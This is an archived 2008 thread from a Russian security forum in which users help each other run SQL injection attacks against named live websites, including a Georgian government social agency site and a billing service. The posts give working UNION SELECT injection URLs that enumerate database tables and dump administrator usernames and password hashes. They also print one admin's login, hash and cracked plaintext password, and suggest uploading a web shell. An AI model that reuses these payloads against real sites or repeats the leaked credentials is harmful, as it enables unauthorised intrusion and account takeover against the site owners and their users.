HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6481  
Старый 27.08.2008, 22:27
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248

Репутация: 785
Отправить сообщение для .Begemot. с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforce  
Я сам с осетии а сайт этот моей фирмы где я работаю моя задача найти дыру и покозать её! Я её нашел но вот возникает вопрос! Почему не выводит
http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/*

version()???
http://15rus.ru/txt.php?cat=-3+union+select+0,VERSION(),2,3,4,5,6,7,8/*
 
Ответить с цитированием

  #6482  
Старый 28.08.2008, 00:28
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Цитата:
Сообщение от geforce  
http://15rus.ru/txt.php?cat=-3+union+select+0,schema_name,2,3,4,5,6,7,8+from+in formation_schema.schemata+limit+1,1/*

Выводит u19256 Это что?
Имха... тебе таблы нужны =\

Цитата:
http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+inf ormation_schema.tables/*
(Зацени какой красивый вывод )

Я бы на твоём месте заинтересовался этой:

Цитата:
http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,char(58),user_pas sword),3,4,5,6,7,8,9+from+phpbb_users/*
Залить шеллтеперь дело техники... кибби круто описал всё... дерзай
 
Ответить с цитированием

  #6483  
Старый 28.08.2008, 01:43
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
По умолчанию

Цитата:
Сообщение от slider  
Имха... тебе таблы нужны =\


(Зацени какой красивый вывод )

Я бы на твоём месте заинтересовался этой:



Залить шеллтеперь дело техники... кибби круто описал всё... дерзай
Нашёл админа имя и пороль:

Mihael:3fde6bb0541387e4ebdadf7c2ff31123

пороль: 1q2w3e
Не заходит почему?
http://15rus.ru//forum/index.php
 
Ответить с цитированием

  #6484  
Старый 28.08.2008, 02:05
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Эмм, там таблиц с юзерами пхпбб форума аж 3 -
http://15rus.ru/txt.php?cat=-3+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name=0x757365 726E616D65/*
Тебе нужна не phpbb_users, а phpbb2_users, ибо у мну ща выпала ошибка -
phpBB : Critical Error

Error obtaining user details

DEBUG MODE

SELECT * FROM phpbb2_users WHERE user_id = -1

=/

Правильный запрос выглядит так -
http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,0x3a,user_passwor d),3,4,5,6,7,8,9+from+u19256.phpbb2_users+where+us er_level=1/*
Это 4 админа форума, теперь расшифровывай хэши

Последний раз редактировалось 0nep@t0p; 28.08.2008 в 02:14..
 
Ответить с цитированием

  #6485  
Старый 28.08.2008, 03:25
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

грузинский сайтег The So cial Subsi dy Agency

http://www.ssa.gov.ge

Код:
http://www.ssa.gov.ge/index.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
version() - 4.0.27
user() - ssa_gov_ge@localhost
database() - ssa_gov_ge

Пробовал получить доступ к mysql.user , но его нету.
 
Ответить с цитированием

  #6486  
Старый 28.08.2008, 07:48
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

А подскажите плиз как увидеть поле...

....pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--

Этим запросом мы видим Table and Column в БД information_schema как сделать так чтоб было видно поле в колонке?
 
Ответить с цитированием

  #6487  
Старый 28.08.2008, 07:57
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

вот так
Цитата:
....pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,<имя столбца который хочешь посмотреть>)+from+<имя таблицы, где эта колонка>+limit+0,1--
 
Ответить с цитированием

  #6488  
Старый 28.08.2008, 08:13
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

видимо немного не так меня понели или это я не понимаю так как 1 раз инъекцию провожу

У меня есть БД information_schema в ней есть в ней есть таблица user_list в этой таблице есть поля такие как pass и login и мне нужно посмотреть значение этих полей.

С помощью этого запроса я вижу таблицу и колонку user_list:ass

Цитата:
...pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+237,1--
 
Ответить с цитированием

  #6489  
Старый 28.08.2008, 08:17
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

я же вроде написал как...
Цитата:
...pricelist.php?step=2&server=-2+union+select+concat_ws(0x3a3a,login,pass)+from+u ser_list+limit+0,1--
только пробел удали в user_list
 
Ответить с цитированием

  #6490  
Старый 28.08.2008, 08:39
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Кароче вот запрос на таблицу с полем пасс

Цитата:
https://billing.adenazone.ru/pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,c olumn_name)%20from%20information_schema.columns+li mit+232,1--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ